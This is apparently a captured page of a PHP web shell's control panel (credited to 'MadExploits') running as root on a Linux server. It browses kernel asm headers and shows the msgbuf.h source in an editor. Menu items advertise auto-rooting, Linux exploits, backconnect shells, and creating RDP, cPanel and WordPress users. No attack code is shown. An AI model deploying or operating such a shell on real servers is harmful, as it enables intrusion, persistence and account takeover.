Linux r-1tbfree-gecko-e8ip2zsa-2f967-wvg4t 6.12.63-84.121.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Dec 31 02:07:30 UTC 2025 x86_64
PHP/8.5.2 (Development Server)
: | : 10.16.21.217
Cant Read [ /etc/named.conf ]
8.5.2
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
hppa-linux-gnu /
asm /
[ HOME SHELL ]
Name
Size
Permission
Action
auxvec.h
198
B
-rw-r--r--
bitsperlong.h
302
B
-rw-r--r--
bpf_perf_event.h
40
B
-rw-r--r--
byteorder.h
194
B
-rw-r--r--
cachectl.h
354
B
-rw-r--r--
errno.h
5.5
KB
-rw-r--r--
fcntl.h
1
KB
-rw-r--r--
ioctl.h
1.67
KB
-rw-r--r--
ioctls.h
3.67
KB
-rw-r--r--
ipcbuf.h
837
B
-rw-r--r--
mman.h
3.79
KB
-rw-r--r--
msgbuf.h
1.22
KB
-rw-r--r--
param.h
31
B
-rw-r--r--
pdc.h
24.45
KB
-rw-r--r--
poll.h
30
B
-rw-r--r--
posix_types.h
639
B
-rw-r--r--
ptrace.h
2.74
KB
-rw-r--r--
resource.h
34
B
-rw-r--r--
sembuf.h
908
B
-rw-r--r--
setup.h
173
B
-rw-r--r--
shmbuf.h
1.45
KB
-rw-r--r--
sigcontext.h
557
B
-rw-r--r--
siginfo.h
33
B
-rw-r--r--
signal.h
1.73
KB
-rw-r--r--
socket.h
4.09
KB
-rw-r--r--
sockios.h
33
B
-rw-r--r--
stat.h
1.76
KB
-rw-r--r--
statfs.h
181
B
-rw-r--r--
swab.h
30
B
-rw-r--r--
termbits.h
3.54
KB
-rw-r--r--
termios.h
33
B
-rw-r--r--
types.h
31
B
-rw-r--r--
unistd.h
277
B
-rw-r--r--
unistd_32.h
10.62
KB
-rw-r--r--
unistd_64.h
9.93
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : msgbuf.h
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ #ifndef _PARISC_MSGBUF_H #define _PARISC_MSGBUF_H #include <asm/bitsperlong.h> #include <asm/ipcbuf.h> /* * The msqid64_ds structure for parisc architecture, copied from sparc. * Note extra padding because this structure is passed back and forth * between kernel and user space. * * Pad space is left for: * - 2 miscellaneous 32-bit values */ struct msqid64_ds { struct ipc64_perm msg_perm; #if __BITS_PER_LONG == 64 long msg_stime; /* last msgsnd time */ long msg_rtime; /* last msgrcv time */ long msg_ctime; /* last change time */ #else unsigned long msg_stime_high; unsigned long msg_stime; /* last msgsnd time */ unsigned long msg_rtime_high; unsigned long msg_rtime; /* last msgrcv time */ unsigned long msg_ctime_high; unsigned long msg_ctime; /* last change time */ #endif unsigned long msg_cbytes; /* current number of bytes on queue */ unsigned long msg_qnum; /* number of messages in queue */ unsigned long msg_qbytes; /* max number of bytes on queue */ __kernel_pid_t msg_lspid; /* pid of last msgsnd */ __kernel_pid_t msg_lrpid; /* last receive pid */ unsigned long __unused1; unsigned long __unused2; }; #endif /* _PARISC_MSGBUF_H */
Close